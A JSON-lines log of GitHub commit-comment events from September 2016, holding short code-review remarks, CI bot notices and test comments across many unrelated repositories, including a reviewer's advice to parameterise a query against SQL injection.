{"id":"4595703201","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19112214,"position":null,"line":null,"path":null,"commit_id":"c66f80bd2742a9af0ad452045e8b5f901730e5a8","created_at":"2016-09-21T11:42:24Z","updated_at":"2016-09-21T11:42:24Z","body":"#360"}},"created_at":"2016-09-21T11:42:24Z"}
{"id":"4595708561","type":"CommitCommentEvent","actor":{"login":"mpkh"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19112224,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-21T11:43:41Z","updated_at":"2016-09-21T11:43:41Z","body":"@thankjura ужс, проще уж действительно симлинки добавить"}},"created_at":"2016-09-21T11:43:41Z"}
{"id":"4595711961","type":"CommitCommentEvent","actor":{"login":"roukaour"},"repo":{"name":"roukaour/pokecrystal"},"payload":{"comment":{"id":19112236,"position":null,"line":null,"path":null,"commit_id":"f8254a0d33785139c5a7688e6adf0c0ef50871c5","created_at":"2016-09-21T11:44:30Z","updated_at":"2016-09-21T11:44:30Z","body":"I'd probably use the party sprites, which only face forward. Which would look kind of awkward/weird, so I haven't even tried implementing it. I just recorded it as a possible neat feature if it could somehow be done well.\r\n\r\nIt looks like the TM/HM menu code is already mostly isolated in engine/tmhm2.asm, so rewriting just that pocket without breaking the others might not be too hard. Marts that sell TMs are a separate issue, but since those merchants *only* sell TMs, it could be implemented as a new mart type."}},"created_at":"2016-09-21T11:44:30Z"}
{"id":"4595712190","type":"CommitCommentEvent","actor":{"login":"mygithub73"},"repo":{"name":"mygithub73/maitefp73a"},"payload":{"comment":{"id":19112237,"position":null,"line":null,"path":null,"commit_id":"f8ff7b6a3512cfceefb0192b08c8028e767efa73","created_at":"2016-09-21T11:44:33Z","updated_at":"2016-09-21T11:44:33Z","body":"Kaixo esto es una prueba Maite"}},"created_at":"2016-09-21T11:44:33Z"}
{"id":"4595715605","type":"CommitCommentEvent","actor":{"login":"ritchiecarroll"},"repo":{"name":"GridProtectionAlliance/openSPM"},"payload":{"comment":{"id":19112249,"position":19,"line":3001,"path":"Source/WebSite/DataHub.cs","commit_id":"04720e84d4368b9e554782f04f19c0135fcf9fb2","created_at":"2016-09-21T11:45:18Z","updated_at":"2016-09-21T11:45:18Z","body":"To prevent possible SQL Injection attacks, change {role} to {0} and add role as a construction parameter of RecordRestriction, should also remove $ from beginning of string so that this is not using string interpolation."}},"created_at":"2016-09-21T11:45:18Z"}
{"id":"4595727082","type":"CommitCommentEvent","actor":{"login":"MatevzBreska"},"repo":{"name":"beaylott/emoncms-docker"},"payload":{"comment":{"id":19112274,"position":null,"line":null,"path":null,"commit_id":"9cdf2951cd30fc47afaeeaffeea6e844be67cbbc","created_at":"2016-09-21T11:47:52Z","updated_at":"2016-09-21T11:47:52Z","body":"Hello! :)\r\n\r\nI have a question. I tried to pull emoncms-docker on my Raspberry PI in the following way:\r\n\r\n`$ git clone https://github.com/emoncms/emoncms-docker`\r\n`$ cd emoncms-docker`\r\n\r\nI changd the files according to above\r\n\r\n`$ docker-compose pull`\r\n\r\nAt this point I got the following error:\r\n`ERROR: Error: image beaylott/rpi-mysql not found`\r\n\r\nI am interested if you have any solution for this or direction for me :)\r\n\r\nThanks, Matevž"}},"created_at":"2016-09-21T11:47:52Z"}
{"id":"4595730137","type":"CommitCommentEvent","actor":{"login":"ritchiecarroll"},"repo":{"name":"GridProtectionAlliance/openSPM"},"payload":{"comment":{"id":19112277,"position":19,"line":3001,"path":"Source/WebSite/DataHub.cs","commit_id":"04720e84d4368b9e554782f04f19c0135fcf9fb2","created_at":"2016-09-21T11:48:35Z","updated_at":"2016-09-21T11:48:35Z","body":"Can remove quotes around parameter, i.e., {0} not '{0}' since parametrized query will take care of quoting values as needed."}},"created_at":"2016-09-21T11:48:35Z"}
{"id":"4595734286","type":"CommitCommentEvent","actor":{"login":"linyiwangteng"},"repo":{"name":"linyiwangteng/CSS"},"payload":{"comment":{"id":19112281,"position":null,"line":null,"path":null,"commit_id":"e2aa2e6ed3cb61437796ea48234e2e6b7e5d95f2","created_at":"2016-09-21T11:49:31Z","updated_at":"2016-09-21T11:49:31Z","body":"sass"}},"created_at":"2016-09-21T11:49:31Z"}
{"id":"4595734862","type":"CommitCommentEvent","actor":{"login":"3nids"},"repo":{"name":"QGEP/QGEP"},"payload":{"comment":{"id":19112283,"position":null,"line":null,"path":null,"commit_id":"41c0014d8d0a7e45d00cbdbe9599d5ea63e77146","created_at":"2016-09-21T11:49:39Z","updated_at":"2016-09-21T11:49:39Z","body":"thanks for these fixes, it's not really funny to merge this into another project, but thanks anyway!"}},"created_at":"2016-09-21T11:49:39Z"}
{"id":"4595738764","type":"CommitCommentEvent","actor":{"login":"tistatos"},"repo":{"name":"einarsandberg/test"},"payload":{"comment":{"id":19112291,"position":1,"line":1,"path":"README.md","commit_id":"d13aa5847ad3b13cd2922c2fad52650437d99249","created_at":"2016-09-21T11:50:34Z","updated_at":"2016-09-21T11:50:34Z","body":"test worked"}},"created_at":"2016-09-21T11:50:34Z"}
{"id":"4595739110","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19112293,"position":4,"line":4,"path":"main.js","commit_id":"959d7888bc25b981ee285e9f0994ff5e559ed9e3","created_at":"2016-09-21T11:50:39Z","updated_at":"2016-09-21T11:50:39Z","body":"About 4.5 hours at the current tick rate"}},"created_at":"2016-09-21T11:50:39Z"}
{"id":"4595742191","type":"CommitCommentEvent","actor":{"login":"bhaskar24"},"repo":{"name":"bhaskar24/ns-3_RARED"},"payload":{"comment":{"id":19112298,"position":null,"line":null,"path":null,"commit_id":"51a10c85b8956f4e06118ac68cd01398981bb7a0","created_at":"2016-09-21T11:51:21Z","updated_at":"2016-09-21T11:51:21Z","body":"Updated README"}},"created_at":"2016-09-21T11:51:21Z"}
{"id":"4595744043","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":19112303,"position":141,"line":1613,"path":"src/ng/directive/input.js","commit_id":"9a8b8aaa9641bfc85d245c4355fa5481285b593f","created_at":"2016-09-21T11:51:44Z","updated_at":"2016-09-21T11:51:44Z","body":"Right. Actually, according to [the spec][1]:\r\n\r\n- If there is a `min` attribute its vaue is used as `step base`.\r\n- If there is not a `min` attribute, but there is a `value` attribute, then _its_ value is used a `step base`.\r\n- Else (and since there is no `default step base` for `input[range]` afaitc), the `step base` is 0.\r\n\r\n<sub>I feel like we are dangerously close to entering browser territory.</sub>\r\n\r\n[1]: https://www.w3.org/TR/html5/forms.html#concept-input-min-zero"}},"created_at":"2016-09-21T11:51:44Z"}
{"id":"4595745836","type":"CommitCommentEvent","actor":{"login":"racardoso"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":19112307,"position":null,"line":null,"path":null,"commit_id":"db8af9a74d192d99c3d1d89d292bbd09a06796cb","created_at":"2016-09-21T11:52:09Z","updated_at":"2016-09-21T11:52:09Z","body":"Maybe. I am just checking the build time on x86. Originally this was made when we have all ppc instructions on decoder because they reject a PR that remove NO_OPT because it's increase the build time for others architectures. Now with less instructions i don't know if this makes senses anymore. Maybe now i can just remove NO_OPT. Anyway i will send a new pull request i am only check if i need this guard."}},"created_at":"2016-09-21T11:52:09Z"}
{"id":"4595749540","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-select-toggle-fields"},"payload":{"comment":{"id":19112315,"position":null,"line":null,"path":null,"commit_id":"e7321ccc5df36e1f2ad210f7d711677f5edd03e9","created_at":"2016-09-21T11:53:01Z","updated_at":"2016-09-21T11:53:01Z","body":"Won't this add `clone()` to all function and not only this scope? This will make for an unstable API which leads to bugs since this widget isn't always loaded.\r\n\r\nWhat if someone else has a different `clone()`? It sounds more like this belongs in h5p.js… but will anyone else really benefit from it?\r\n\r\nI suggest we make this a private/scope function instead..."}},"created_at":"2016-09-21T11:53:01Z"}
{"id":"4595749828","type":"CommitCommentEvent","actor":{"login":"kermeat"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19112316,"position":null,"line":null,"path":null,"commit_id":"75512e9322869b79e57d4eefb43e29e10e60f316","created_at":"2016-09-21T11:53:05Z","updated_at":"2016-09-21T11:53:05Z","body":"some distributions store files in ${LIB_DIR}/qt/Qca-qt5/QtCrypto"}},"created_at":"2016-09-21T11:53:05Z"}
{"id":"4595750809","type":"CommitCommentEvent","actor":{"login":"Ryuno-Ki"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19112318,"position":null,"line":null,"path":null,"commit_id":"46799e7206736db0e03b7ce6f6dc9e30fadd5fd7","created_at":"2016-09-21T11:53:17Z","updated_at":"2016-09-21T11:53:17Z","body":"@mykmelez Nit: Why don't comment it as 3 * 60 * 60 (seconds)?"}},"created_at":"2016-09-21T11:53:17Z"}
{"id":"4595755434","type":"CommitCommentEvent","actor":{"login":"simvery"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19112329,"position":null,"line":null,"path":null,"commit_id":"50fa1a91482da0577d8b952dbabf03e8445803cb","created_at":"2016-09-21T11:54:22Z","updated_at":"2016-09-21T11:54:22Z","body":"10번줄 block에 포인터 형식이 필요하다고 합니다!"}},"created_at":"2016-09-21T11:54:22Z"}
{"id":"4595760187","type":"CommitCommentEvent","actor":{"login":"rashig"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19112336,"position":33,"line":33,"path":"hydrator-plugins/spark-plugins/docs/GDTreeTrainer-sparksink.md","commit_id":"189f8eb391e3ecbcac21507176a5b0d85ccc2064","created_at":"2016-09-21T11:55:27Z","updated_at":"2016-09-21T11:55:27Z","body":". at the end of line"}},"created_at":"2016-09-21T11:55:27Z"}
{"id":"4595760631","type":"CommitCommentEvent","actor":{"login":"qoomon"},"repo":{"name":"tobi-sh/Jira-Issue-Card-Printer"},"payload":{"comment":{"id":19112337,"position":null,"line":null,"path":null,"commit_id":"51b2328dcfc4c1d4f82b4e93c00a9b3bc9548192","created_at":"2016-09-21T11:55:33Z","updated_at":"2016-09-21T11:55:33Z","body":"Bitte das Copyright drin lassen."}},"created_at":"2016-09-21T11:55:33Z"}
{"id":"4595761320","type":"CommitCommentEvent","actor":{"login":"mygithub73"},"repo":{"name":"mygithub73/maitefp73a"},"payload":{"comment":{"id":19112339,"position":1,"line":1,"path":"ComoLoLlevas.txt","commit_id":"70399e410b8e1a5755c57e521852dd9d745ba3c1","created_at":"2016-09-21T11:55:42Z","updated_at":"2016-09-21T11:55:42Z","body":"lo llevo que no es poco gracias y tu veo que bien...."}},"created_at":"2016-09-21T11:55:42Z"}
{"id":"4595761632","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ananya-bhattacharya/hydrator-plugins"},"payload":{"comment":{"id":19112340,"position":null,"line":null,"path":null,"commit_id":"27093a8534bb435e23fd6f518aaf28c8bc732ee1","created_at":"2016-09-21T11:55:46Z","updated_at":"2016-09-21T11:55:46Z","body":"Trainer and Predictor classes for training the data using Random Forest Regression (Spark ML).\r\nThis uses a flight data taken from http://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236&DB_Short_Name=On-Time."}},"created_at":"2016-09-21T11:55:46Z"}
{"id":"4595763177","type":"CommitCommentEvent","actor":{"login":"moteus"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":19112344,"position":5,"line":177,"path":"app/extensions/resources/classes/extension.php","commit_id":"623fa846e3ebd9ecf8f5f797a5f74be17ee2b895","created_at":"2016-09-21T11:56:08Z","updated_at":"2016-09-21T11:56:08Z","body":"Remove one `AND`"}},"created_at":"2016-09-21T11:56:08Z"}
{"id":"4595764384","type":"CommitCommentEvent","actor":{"login":"fordth"},"repo":{"name":"fordth/jinqJs"},"payload":{"comment":{"id":19112348,"position":null,"line":null,"path":null,"commit_id":"789558db82ff0f112acf0f80dcd3bb0906f2db9b","created_at":"2016-09-21T11:56:23Z","updated_at":"2016-09-21T11:56:23Z","body":"Was there and issue open for this, sorry if I missed it? What was the issue, sorting?"}},"created_at":"2016-09-21T11:56:23Z"}
{"id":"4595768193","type":"CommitCommentEvent","actor":{"login":"rashig"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19112357,"position":54,"line":54,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/GDTreeTrainer.java","commit_id":"189f8eb391e3ecbcac21507176a5b0d85ccc2064","created_at":"2016-09-21T11:57:13Z","updated_at":"2016-09-21T11:57:13Z","body":"Either use GD-Tree or GD Tree everywhere.\r\n"}},"created_at":"2016-09-21T11:57:13Z"}
{"id":"4595774425","type":"CommitCommentEvent","actor":{"login":"rashig"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19112367,"position":113,"line":113,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/GDTreeTrainer.java","commit_id":"189f8eb391e3ecbcac21507176a5b0d85ccc2064","created_at":"2016-09-21T11:58:41Z","updated_at":"2016-09-21T11:58:41Z","body":"We can add @Nullable in the constructor, for nullable parameters."}},"created_at":"2016-09-21T11:58:41Z"}
{"id":"4595775160","type":"CommitCommentEvent","actor":{"login":"tonsky"},"repo":{"name":"tonsky/AnyBar"},"payload":{"comment":{"id":19112368,"position":8,"line":22,"path":"README.md","commit_id":"0438031cde94663a9846e9f402c343ecd487de4e","created_at":"2016-09-21T11:58:52Z","updated_at":"2016-09-21T11:58:52Z","body":"true"}},"created_at":"2016-09-21T11:58:52Z"}
{"id":"4595776580","type":"CommitCommentEvent","actor":{"login":"rashig"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19112372,"position":148,"line":148,"path":"hydrator-plugins/spark-plugins/src/main/java/co/cask/hydrator/plugin/batch/spark/GDTreeTrainer.java","commit_id":"189f8eb391e3ecbcac21507176a5b0d85ccc2064","created_at":"2016-09-21T11:59:11Z","updated_at":"2016-09-21T11:59:11Z","body":". at the end of the line"}},"created_at":"2016-09-21T11:59:11Z"}
{"id":"4595778362","type":"CommitCommentEvent","actor":{"login":"meshalmarakkar"},"repo":{"name":"lab-account/git-lab"},"payload":{"comment":{"id":19112376,"position":6,"line":10,"path":"j.pbm","commit_id":"050648dd4fd97f5e22435e2ccf68e4a31aa73131","created_at":"2016-09-21T11:59:36Z","updated_at":"2016-09-21T11:59:36Z","body":"B00269701"}},"created_at":"2016-09-21T11:59:36Z"}
{"id":"4595785550","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19112395,"position":null,"line":null,"path":null,"commit_id":"00250123aa4637c41f5405e0e7886365f0ccf5e9","created_at":"2016-09-21T12:01:07Z","updated_at":"2016-09-21T12:01:07Z","body":"*facepalm*"}},"created_at":"2016-09-21T12:01:07Z"}
{"id":"4595786772","type":"CommitCommentEvent","actor":{"login":"qoomon"},"repo":{"name":"tobi-sh/Jira-Issue-Card-Printer"},"payload":{"comment":{"id":19112400,"position":null,"line":null,"path":null,"commit_id":"03673e3af734dcb729be7cf28fb1d23e892f60cc","created_at":"2016-09-21T12:01:23Z","updated_at":"2016-09-21T12:01:23Z","body":"Wäre super wenn du den analytics teil drin lassen könntest"}},"created_at":"2016-09-21T12:01:23Z"}
{"id":"4595787873","type":"CommitCommentEvent","actor":{"login":"rashig"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19112402,"position":null,"line":null,"path":null,"commit_id":"189f8eb391e3ecbcac21507176a5b0d85ccc2064","created_at":"2016-09-21T12:01:38Z","updated_at":"2016-09-21T12:01:38Z","body":"Reviewed.\r\nMinor Comments"}},"created_at":"2016-09-21T12:01:38Z"}
{"id":"4595791793","type":"CommitCommentEvent","actor":{"login":"JohnyDeath"},"repo":{"name":"silverbulleters/vanessa-behavior-new"},"payload":{"comment":{"id":19112415,"position":15,"line":155,"path":"vanessa-behavior/VanessaBehavior/Forms/УправляемаяФорма/Ext/Form/Module.bsl","commit_id":"fd0b3e4629d8524f10b9219fbeb0ecb01f96e22a","created_at":"2016-09-21T12:02:31Z","updated_at":"2016-09-21T12:02:31Z","body":"Что это? И для чего? Жутковато выглядит )"}},"created_at":"2016-09-21T12:02:31Z"}
{"id":"4595793472","type":"CommitCommentEvent","actor":{"login":"ChristianBeer"},"repo":{"name":"BOINC/boinc"},"payload":{"comment":{"id":19112427,"position":15,"line":800,"path":"lib/str_util.cpp","commit_id":"01ea1ef8fb659c4488425f9bea380009ebe6843f","created_at":"2016-09-21T12:02:53Z","updated_at":"2016-09-21T12:02:53Z","body":"Well, it turns out `basename()` has several issues when used in this context. First it returns a pointer that points to a position within the provided char array. So `basename(fpath.c_str())` doesn't work, I have to `safe_copy()` it before the call to supply it with a non-const char array. I would then have to copy it again so the caller is able to free the array after use. This would look like this:\r\n```C\r\nint path_to_filename(string fpath, char* &fname) {\r\n    if (fpath.size() == 0) {\r\n        return -1;\r\n    }\r\n    if (fpath[fpath.size()-1] == '/') {\r\n        return -2;\r\n    }\r\n    char* apath = new char[fpath.size()+1];\r\n    std::copy(fpath.begin(), fpath.end(), apath);\r\n    apath[fpath.size()]= '\\0';\r\n\r\n    char* base = basename(apath);\r\n    fname = new char[strlen(base)+1];\r\n    strcpy(fname, base);\r\n    fname[strlen(base)] = '\\0';\r\n\r\n    delete[] apath;\r\n    return 0;\r\n}\r\n\r\nint main() {\r\n    char* name = NULL;\r\n    string path = \"/tmp/abc/a\";\r\n\r\n    int ret = path_to_filename(path, name);\r\n\r\n    printf(\"ret: %d\\n\", ret);\r\n    printf(\"path : %s\\n\", path.c_str());\r\n    printf(\"name : %s\\n\", name);\r\n\r\n    delete[] name;\r\n    return 0;\r\n}\r\n```\r\nBesides the added complexity of the extra copy and the higher memory footprint, it is not portable. Depending on the speed of the `basename()` implementation I would guess that it is slower than my `str.rfind()`, `str.substr()` solution that works on strings instead of char arrays."}},"created_at":"2016-09-21T12:02:53Z"}
{"id":"4595795618","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19112429,"position":null,"line":null,"path":null,"commit_id":"e61f1c621d6213ba5573198bbfea47f91b51e23c","created_at":"2016-09-21T12:03:22Z","updated_at":"2016-09-21T12:03:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 60](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13743&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-21T12:03:22Z"}
{"id":"4595796988","type":"CommitCommentEvent","actor":{"login":"ioannad"},"repo":{"name":"ioannad/experiments"},"payload":{"comment":{"id":19112433,"position":53,"line":56,"path":"rpiOS/K9OS/k9os.c","commit_id":"dab4692eedcefd23f5acb07591d03878ce776c42","created_at":"2016-09-21T12:03:40Z","updated_at":"2016-09-21T12:03:40Z","body":"Hey Max, still bugging you too? :) I can still do it by just having pointers for each place of interest I suppose (LED blinks!), e.g., \\*led_prep instead of gpio[4], and I can't really see the benefits of using gpio as an array of pointers (?). Because even if I define pointers to each place of interest, I still end up with less code than what the tutorial is doing, which is having this header: https://github.com/BrianSidebotham/arm-tutorial-rpi/blob/master/part-2/armc-04/rpi-gpio.h and then in the kernel: \r\n`volatile unsigned int* gpio = (unsigned int*)GPIO_BASE;` \r\nand \r\n`gpio[LED_GPFSEL] |= (1 << LED_GPFBIT);` \r\netc. \r\n\r\nBut yes, I don't really understand what does gpio[...] mean, and, even if it is as you said, I still think it's a bit confusing: how to calculate the \"array\" indices, and why the \"wrong\" type?"}},"created_at":"2016-09-21T12:03:40Z"}
{"id":"4595802287","type":"CommitCommentEvent","actor":{"login":"rikylie"},"repo":{"name":"rikylie/test"},"payload":{"comment":{"id":19112441,"position":2,"line":2,"path":"home.html","commit_id":"17276bbddcc7d504dee5becc9e3f06825a2a59f8","created_at":"2016-09-21T12:04:38Z","updated_at":"2016-09-21T12:04:38Z","body":"<tittle>\r\ntest\r\n</tittle>"}},"created_at":"2016-09-21T12:04:38Z"}
{"id":"4595802710","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19112443,"position":null,"line":null,"path":null,"commit_id":"e61f1c621d6213ba5573198bbfea47f91b51e23c","created_at":"2016-09-21T12:04:44Z","updated_at":"2016-09-21T12:04:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 60](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13743&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:22"}},"created_at":"2016-09-21T12:04:44Z"}
{"id":"4595809477","type":"CommitCommentEvent","actor":{"login":"gmdimitriz"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19112456,"position":51,"line":51,"path":"src/Device/Driver/ThermalExpress/Driver.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T12:06:14Z","updated_at":"2016-09-21T12:06:14Z","body":"my device will always send with theese two arguments... i made this that way following another driver examples... but i can change it if you think this is not the best way, no problem. "}},"created_at":"2016-09-21T12:06:14Z"}
{"id":"4595810024","type":"CommitCommentEvent","actor":{"login":"elpaso"},"repo":{"name":"boundlessgeo/qgis-plugin-template"},"payload":{"comment":{"id":19112458,"position":27,"line":27,"path":"pavement.py","commit_id":"712640bb86f66b3d7be287863e54e4d8651f0633","created_at":"2016-09-21T12:06:21Z","updated_at":"2016-09-21T12:06:21Z","body":"@volaya Why is `metadata.txt` excluded? It seems to me that we will produce and invalid package when we call `paver package`"}},"created_at":"2016-09-21T12:06:21Z"}
{"id":"4595811006","type":"CommitCommentEvent","actor":{"login":"benjamincharity"},"repo":{"name":"benjamincharity/angular-keypad"},"payload":{"comment":{"id":19112460,"position":5,"line":40,"path":"src/keypad.controller.js","commit_id":"f50116dcb3516d00fc1311181c1fab5b771b8910","created_at":"2016-09-21T12:06:35Z","updated_at":"2016-09-21T12:06:35Z","body":"Very good point. I have removed it here: https://github.com/benjamincharity/angular-keypad/commit/e7770dbc1bd17a470ec03f44902fe1d06e657880 \r\n\r\nThanks for pointing this out; I am always looking for ways to clean things up!"}},"created_at":"2016-09-21T12:06:35Z"}
{"id":"4595815014","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19112466,"position":null,"line":null,"path":null,"commit_id":"8d5ed73bd838094b3616815691b773acb3b80662","created_at":"2016-09-21T12:07:30Z","updated_at":"2016-09-21T12:07:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#FBRDW5ISTrCEUK6JKK8gCA"}},"created_at":"2016-09-21T12:07:30Z"}
{"id":"4595818818","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"QGEP/QGEP"},"payload":{"comment":{"id":19112475,"position":null,"line":null,"path":null,"commit_id":"41c0014d8d0a7e45d00cbdbe9599d5ea63e77146","created_at":"2016-09-21T12:08:23Z","updated_at":"2016-09-21T12:08:23Z","body":"Wait with merging, more to come!"}},"created_at":"2016-09-21T12:08:23Z"}
{"id":"4595823871","type":"CommitCommentEvent","actor":{"login":"IMLaing"},"repo":{"name":"clurdablur/pirate-bartender"},"payload":{"comment":{"id":19112504,"position":null,"line":null,"path":null,"commit_id":"001562db34c0f9c8e3181750930ee7f035272f09","created_at":"2016-09-21T12:09:28Z","updated_at":"2016-09-21T12:09:28Z","body":"\\<br> is a break \\</br> is not needed. lines 18 24 30 36 42\r\nYou have a fluid-container class but I didn't see bootstraps linked in your \\<head>"}},"created_at":"2016-09-21T12:09:28Z"}
{"id":"4595826032","type":"CommitCommentEvent","actor":{"login":"simplechris"},"repo":{"name":"monzo/mercury"},"payload":{"comment":{"id":19112509,"position":null,"line":null,"path":null,"commit_id":"d4d01cf2efdd19e2d5178c9eb626a83699b88353","created_at":"2016-09-21T12:09:55Z","updated_at":"2016-09-21T12:09:55Z","body":"Could I ask what you are deprecating mercury in favour of?"}},"created_at":"2016-09-21T12:09:55Z"}
{"id":"4595826444","type":"CommitCommentEvent","actor":{"login":"AndreSD74"},"repo":{"name":"AndreSD74/projeto1"},"payload":{"comment":{"id":19112511,"position":null,"line":null,"path":null,"commit_id":"ad0105295d8f08a51c591b5711012aeb605a64f4","created_at":"2016-09-21T12:09:59Z","updated_at":"2016-09-21T12:09:59Z","body":"Arquivo criado na interface Web para demonstração durante o curso."}},"created_at":"2016-09-21T12:09:59Z"}
{"id":"4595826613","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19112512,"position":null,"line":null,"path":null,"commit_id":"387b3b84f211e2d32ff5f6b5e205ae2c212f2403","created_at":"2016-09-21T12:10:01Z","updated_at":"2016-09-21T12:10:01Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-21T12:10:01Z"}
{"id":"4595827745","type":"CommitCommentEvent","actor":{"login":"Fabuqare"},"repo":{"name":"Fabuqare/fadi"},"payload":{"comment":{"id":19112516,"position":null,"line":null,"path":null,"commit_id":"2c300a812e85a5667d670a472f7fa6ece6b89100","created_at":"2016-09-21T12:10:16Z","updated_at":"2016-09-21T12:10:16Z","body":"changing the booth"}},"created_at":"2016-09-21T12:10:16Z"}
{"id":"4595828275","type":"CommitCommentEvent","actor":{"login":"krunal18jmp"},"repo":{"name":"krunal18jmp/Laravel"},"payload":{"comment":{"id":19112518,"position":null,"line":null,"path":null,"commit_id":"7ce3f08593c015213a2faf04d094427fa1cf4185","created_at":"2016-09-21T12:10:22Z","updated_at":"2016-09-21T12:10:22Z","body":"Hello , I am krunal Patel.\r\n"}},"created_at":"2016-09-21T12:10:22Z"}
{"id":"4595829116","type":"CommitCommentEvent","actor":{"login":"Fabuqare"},"repo":{"name":"Fabuqare/fadi"},"payload":{"comment":{"id":19112522,"position":null,"line":null,"path":null,"commit_id":"2c300a812e85a5667d670a472f7fa6ece6b89100","created_at":"2016-09-21T12:10:33Z","updated_at":"2016-09-21T12:10:33Z","body":"including files"}},"created_at":"2016-09-21T12:10:33Z"}
{"id":"4595833468","type":"CommitCommentEvent","actor":{"login":"obeattie"},"repo":{"name":"monzo/mercury"},"payload":{"comment":{"id":19112548,"position":null,"line":null,"path":null,"commit_id":"d4d01cf2efdd19e2d5178c9eb626a83699b88353","created_at":"2016-09-21T12:11:31Z","updated_at":"2016-09-21T12:11:31Z","body":"@simplechris [monzo/typhon](https://github.com/monzo/typhon). This now contains all the primitives we use to write services internally (but it is HTTP-only).\r\n\r\nAre you using Mercury?"}},"created_at":"2016-09-21T12:11:31Z"}
{"id":"4595838572","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/guides"},"payload":{"comment":{"id":19112569,"position":105,"line":94,"path":"README.md","commit_id":"b756d3a62bb1ec527bb34e295651940c6bd5633c","created_at":"2016-09-21T12:12:37Z","updated_at":"2016-09-21T12:12:37Z","body":"Do you want to go with \"he\" rather than \"they\"?"}},"created_at":"2016-09-21T12:12:37Z"}
{"id":"4595838853","type":"CommitCommentEvent","actor":{"login":"jingai"},"repo":{"name":"jingai/skin.metropolis"},"payload":{"comment":{"id":19112572,"position":null,"line":null,"path":null,"commit_id":"864a5d3423c9aa7b9698e7c20245e88dcbd41c34","created_at":"2016-09-21T12:12:41Z","updated_at":"2016-09-21T12:12:41Z","body":"@MacGyverr , just checking in to see if this is fixed for you now."}},"created_at":"2016-09-21T12:12:41Z"}
